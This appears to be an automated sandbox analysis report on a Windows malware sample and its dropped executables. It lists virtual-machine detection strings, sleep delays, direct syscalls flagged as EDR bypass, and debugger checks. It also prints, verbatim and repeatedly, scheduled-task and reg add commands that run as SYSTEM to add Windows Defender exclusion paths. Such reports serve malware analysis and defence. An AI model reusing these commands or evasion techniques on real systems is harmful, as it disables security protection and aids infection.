Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Dropped PE file which has not been started: C:\Windows\Temp\aceprocted.sys	Jump to dropped file
Source: C:\Users\user\Documents\J8daaU.exe	Dropped PE file which has not been started: C:\Program Files (x86)\u0syUl\u0syUl.exe	Jump to dropped file
Source: C:\Users\user\Documents\J8daaU.exe	Dropped PE file which has not been started: C:\Program Files (x86)\4xCNoe\4xCNoe.exe	Jump to dropped file

Source: C:\Users\user\Documents\J8daaU.exe	API coverage: 2.0 %
Source: C:\Users\user\Documents\J8daaU.exe	API coverage: 5.1 %

Source: C:\Windows\System32\svchost.exe TID: 7948	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 1372	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 1208	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe TID: 4412	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,		8_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,		55_2_00007FF6FCAE9AE0

Source: C:\Users\user\Documents\J8daaU.exe

Thread delayed: delay time: 60000

Source: Gokod.763652.06.exe	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_5e38a278d114b813
Source: Amcache.hve.54.dr	Binary or memory string: VMware
Source: Amcache.hve.54.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2416743689.000001F38545A000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873634000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.2415231315.0000021B06687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gokod.763652.06.exe	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: Amcache.hve.54.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: svchost.exe, 00000001.00000002.2417583087.000001F3FFE2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Gokod.763652.06.exe	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,root\vmwvmcihostdev
Source: Amcache.hve.54.dr	Binary or memory string: vmci.sys
Source: svchost.exe, 00000005.00000002.2414910480.0000021B0664B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gokod.763652.06.exe	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: Amcache.hve.54.dr	Binary or memory string: VMware20,1
Source: Gokod.763652.06.exe, Amcache.hve.54.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.54.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.54.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.54.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.54.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.54.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Gokod.763652.06.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813
Source: Amcache.hve.54.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.54.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.54.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.54.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Gokod.763652.06.exe	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.54.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Gokod.763652.06.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.17369862.B64.2012240522,BiosReleaseDate:12/24/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1\
Source: svchost.exe, 00000005.00000002.2415075707.0000021B06664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Gokod.763652.06.exe	Binary or memory string: VMware, Inc.e
Source: Amcache.hve.54.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.54.dr	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000005.00000002.2414910480.0000021B0664B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.54.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.54.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.54.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Gokod.763652.06.exe	Binary or memory string: VMware-42 17 53 71 ea 62 82 e8-b2 93 b7 a7 7f 7a dc 93
Source: Amcache.hve.54.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Gokod.763652.06.exe	Binary or memory string: VMware VMCI Bus Device0
Source: Gokod.763652.06.exe	Binary or memory string: Manufacturer VMware, Inc.(vk
Source: Gokod.763652.06.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.16460286.B64.2006250725,BiosReleaseDate:06/25/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1(vk
Source: svchost.exe, 00000005.00000002.2414785385.0000021B0662B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.54.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.54.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Gokod.763652.06.exe	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Gokod.763652.06.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813,
Source: Amcache.hve.54.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.54.dr	Binary or memory string: vmci.syshbin`
Source: svchost.exe, 00000005.00000002.2414785385.0000021B0662B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.54.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.54.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Gokod.763652.06.exe	Binary or memory string: VMware7,1
Source: Amcache.hve.54.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: svchost.exe, 00000005.00000002.2414358163.0000021B06602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Gokod.763652.06.exe	Binary or memory string: VMware7,1p
Source: Gokod.763652.06.exe	Binary or memory string: VMware, Inc.ps
Source: Gokod.763652.06.exe	Binary or memory string: VMware, Inc.00
Source: svchost.exe, 00000005.00000002.2414588664.0000021B06622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 55_2_000002B87364A685 rdtsc

55_2_000002B87364A685

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAE4330 LdrLoadDll,

8_2_00007FF6FCAE4330

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF6FCAE8904

Source: C:\Users\user\Documents\J8daaU.exe

8_2_00007FF6FCAE190C

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAEC070 GetProcessHeap,

8_2_00007FF6FCAEC070

Source: C:\Users\user\Documents\J8daaU.exe

Process token adjusted: Debug

Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE29A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF6FCAE29A0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6FCAE8904
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE29A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	55_2_00007FF6FCAE29A0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_00007FF6FCAE8904

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Gokod.763652.06.exe	NtDelayExecution: Indirect: 0x1F9ED5	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtUnmapViewOfSection: Direct from: 0x7FFC9C6212CC
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Indirect: 0x7FFC9C2F497B	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5518B1	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C6017DA
Source: C:\Users\user\Documents\J8daaU.exe	NtOpenFile: Direct from: 0x7FFC9C5427DF	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C62E240
Source: C:\Users\user\Documents\J8daaU.exe	NtMapViewOfSection: Direct from: 0x7FFC9C510B2F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C580B7D
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5DCC47	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C3418BA	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C540B7D	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C342615	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtClose: Direct from: 0x7FFC9C65D668
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5918B1
Source: C:\Users\user\Documents\J8daaU.exe	NtClose: Direct from: 0x7FFC9C581D80
Source: C:\Users\user\Documents\J8daaU.exe	NtAllocateVirtualMemory: Indirect: 0x7FF6FCAE3FE4
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5A6B78	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtOpenFile: Direct from: 0x7FFC9C646A8C
Source: C:\Users\user\Documents\J8daaU.exe	NtOpenFile: Direct from: 0x7FFC9C606A8C	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5EF5B9	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C52977C	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5E6B78
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Indirect: 0x7FFC9C33497B
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C50225E	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C57F9AC
Source: C:\Users\user\Documents\J8daaU.exe	NtMapViewOfSection: Direct from: 0x7FFC9C54ABE5
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C3818BA
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C302EF0	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5C17DA	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C382615
Source: C:\Users\user\Documents\J8daaU.exe	NtMapViewOfSection: Direct from: 0x7FFC9C50ABE5	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C32CDB8	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5B67F9	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5C0D32	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C5EE240	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Direct from: 0x7FFC9C520C71	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtProtectVirtualMemory: Indirect: 0x1811FA25E51	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	NtUnmapViewOfSection: Direct from: 0x7FFC9C53F9AC	Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280

Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\user\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\user\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
